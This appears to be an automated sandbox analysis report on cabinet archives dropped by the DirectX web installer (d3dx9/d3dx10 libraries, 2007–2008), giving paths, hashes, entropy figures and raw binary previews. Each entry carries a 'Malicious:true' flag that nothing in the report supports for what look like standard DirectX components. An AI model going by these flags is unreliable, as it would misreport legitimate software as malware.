                                                                                              Preview:MSCF.... .......D...............i#.......... ....#..............1....).........6.. .d3dx10_34_x86.cat.p)...).....6.. .d3dcompiler_34.dll.h...2S.....6.. .d3dx10_34.dll.I..........6.. .d3dx10_34_x86.inf.i..........6.. .d3dx10_34_x86_xp.inf.c...L......6.. .jun2007_d3dx10_34_x86.inf.....{5..CK.|.|......m:..s66...$.\.-K2...B....-.%..\...zI....-.@...!@..<Z(.@..B..@.?..'.k.......f.67;;;;3..gQi....O.7..F....J.m........".z.=.;9.s.D........P...PV.\.U.D......M...3.{K.k>...[z.u#Q...D,..%.%.$j,@wDT..D..]................8\.S.....X*......$....q..pP>.0.8.(q.IQ..;GGq.H.@...z.F...~(...=............W...9....._A.qtt.D:[.......7D...&..N..ee.J....H..LeS,e...CY....K m..9..\....._.e....E..@R..J)p..~e...I......uA..8<>).X.#....P..O.BN...a9#I})RW..J4P./.i.'..v.Po..5.+K...[..+K..2... `]....@............q.($. <B$...8@..b<." ...b.y..,.<..OK.."*..t..q...{^..5..l........J.(Q.o.Yn.]z.:x6.T..J.Z..zG........ .W..-..l.....2.\O..f/.......TJ&W"S$*.2.@.2.a.*....C.......A...{..!.|. ....UVJ7.#.\T..k..

                                                                                              C:\Windows\msdownld.tmp\AS6CCA19.tmp\Aug2007_d3dx9_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Windows\msdownld.tmp\AS6CD563.tmp\Aug2007_d3dx10_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Windows\msdownld.tmp\AS6CDD52.tmp\Nov2007_d3dx9_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Windows\msdownld.tmp\AS6CE7D2.tmp\Nov2007_d3dx10_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Windows\msdownld.tmp\AS6CEF92.tmp\Mar2008_d3dx9_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Windows\msdownld.tmp\AS6CFCA2.tmp\Mar2008_d3dx10_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Windows\msdownld.tmp\AS6D04A1.tmp\Jun2008_d3dx9_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1457918 bytes, 5 files, at 0x44 "d3dx9_38.dll" "d3dx9_38_x86.cat", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467086
                                                                                              Entropy (8bit):7.999726422350297
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:HGIly6o6H1kEznWRpKpx5A0SBF/VnjmkC8nAMzh08qF4QH5/RSzsExkqv4Q9hHi0:Hh46Tn/UXVjmiJlO4sVRSzdk5uhCbOka
                                                                                              MD5:E2FB2E37C342983493C776BD81943978
                                                                                              SHA1:2A8F3C45CF979966D4D4D42A4D34F05C72C7E29E
                                                                                              SHA-256:57E57A6348E55AAACA6BED5E27BBDD0A4BD0DDE69C77F4D26C805BE6384BE927
                                                                                              SHA-512:2D297F607C5A098A3D2B19E7F88AA12F720AF3C23FE6DDCE7D4659A9184D1CF8F8A76F35B8ACB639B48CDAD8998C919215A03B89207E2BB1829EA3D8A9EFB95A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Windows\msdownld.tmp\AS6D0EA3.tmp\Jun2008_d3dx10_38_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843959 bytes, 6 files, at 0x44 "d3dx10_38.dll" "D3DCompiler_38.dll", flags 0x4, ID 8962, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):853127
                                                                                              Entropy (8bit):7.998980130768887
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:IKcIh4DqtGLRndZKm4zZTQb4BJ+gfG07QyGeZH:IKc64DgG9dIZTQb4L+GGIGeZH
                                                                                              MD5:B0E2B612DAF28B145B197A4DB0A9B721
                                                                                              SHA1:F69266E4AF3D2DE31A2A2E416F10B0F44737739A
                                                                                              SHA-256:E8DC1063C9434EED8D633741B19CDFA1889581041E2214B87B5159E3EA087F3C
                                                                                              SHA-512:6E31F18CB75CE69D291D0ABD15EDADF02C0693033351DFB2F435312A47540AA223C8176209725C14A05FA6494153A3E191B2FB7CB8C5CEE11FB42371CE67392B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................#...............#..............=....$.........8wq..d3dx10_38.dll......$.....8wq..D3DCompiler_38.dll.f(..(......8.r..d3dx10_38_x86.cat.I..........8.r..d3dx10_38_x86.inf.i..........8.r..d3dx10_38_x86_xp.inf.c...@......8.r..Jun2008_d3dx10_38_x86.inf...E7%,..CK..\.....\./BS3...$.......p.&..x"........h....J.,5.,._.e....y..-y...#.......YXPP+..y.......y....o*.&..........\....i...YQcs..u.77K.8..h......h..]L...y6.bc..S.\.Y..]..aM.iyo.Xr..2....w...^V.Y.v)..s..w..;..z...........S..WY.b...!....q..W............y.~.x...P..!z.S.....2..{W.x.tJ.....Y....'o5"dE...(...|o.U'.tpJ....8..4.j.vT.+TrVWy.`.P..{![...O.<.!...F...V.........C.k.E.h._..AM..+...E.jG.U.R.F:.].E...Xvw.?....'..,....................A-p...l.[.J....4.. .$.,...`2X.W.c..=Y.>........i.....A-p.?.....`.8..qp.`...A.....P_1.....? ]O....A?P.&........%..c. ..v...,h.=...AK0........k......d..... ....A{....... .|o......&..|......0........d.....[m......X...%C.D.2X.....'&.4..@o......98.~..c

                                                                                              C:\Windows\msdownld.tmp\AS6D176D.tmp\Aug2008_d3dx9_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Windows\msdownld.tmp\AS6D21AE.tmp\Aug2008_d3dx10_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Windows\msdownld.tmp\AS6D2A0B.tmp\Nov2008_d3dx9_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1544836 bytes, 5 files, at 0x44 "d3dx9_40.dll" "d3dx9_40_x86.cat", flags 0x4, ID 7155, number 1, extra bytes 20 in head, 134 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1554004
                                                                                              Entropy (8bit):7.999645278979612
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:K3tdQkdeoPJLiej+pb7Q15LwQrpLeWvYMWbPBmcnILz+0Byna:2dvdeAweSBQPLwgpCWvYMQ5mcnIH+m
                                                                                              MD5:75556D89FDD442967A23993C9111D997
                                                                                              SHA1:003DE53653C0CC84F8C3D617D1F76FB475F1A7CB
                                                                                              SHA-256:863AC3438F57158D4F53900C6924BFDC132AB43A5AF57D4658E65842836B4FA1
                                                                                              SHA-512:6086114500DBBF4DB9D0A9C3F72732995BB9A3AB5C135EAD53143749B95651B37B64BE7A52CA09388DE90216FD00486FDFCFBC87D42D77FAC469F82B5290E06D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................P.B.......O9.2..d3dx9_40.dll.....P.B...O9n:..d3dx9_40_x86.cat.......B...O9h8..d3dx9_40_x86.inf.,.....B...O9h8..d3dx9_40_x86_xp.inf.\.....B...O9h8..Nov2008_d3dx9_40_x86.inf..=.:.:..[.... .2......$Q.f...<....!Z.J.+...*ea..U.q....ha.x.y...........=.h!............X.{.<,.....?..b.):.[J{....^=mv:.i.e..}9s............F.QN.^+.).p...!9.4L..B.k ....F.}..R.. ..D%P4@...'2.$C..EU..:_... ..=.....2...Q...H|..2.hi....H3.*.%JA.O...s.n-..<.<..9;7p.wnxw,||.....du.......)..$3CN.'.)j..|...x.w..>..4.D..."..I.'.=.....$.7..m...J..F....0..F.XD..v....."*|2...A.H.R..b.()! .|..Hh`....Q.K...NH..9../^...|[!.)k...8._C/~D.W..K4.}.B.T.b.Kw..si..6.E.#6w......_.,.>6{r$X&:....s.w......k....h'5......3...0XOG.^.=..j....sFg.jO. t..?.S.l5?.t...s....`...]......'$LJ.........Z]h.. ..h.l.5b....F..0......m.....P.....n....Z.... <..7.@...,`@..#.i.r....... ......@....|....e/.pa...@Q.A..'.EL..7H..?^..C.........]i p..N7....:i.P.........

                                                                                              C:\Windows\msdownld.tmp\AS6D3527.tmp\Nov2008_d3dx10_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
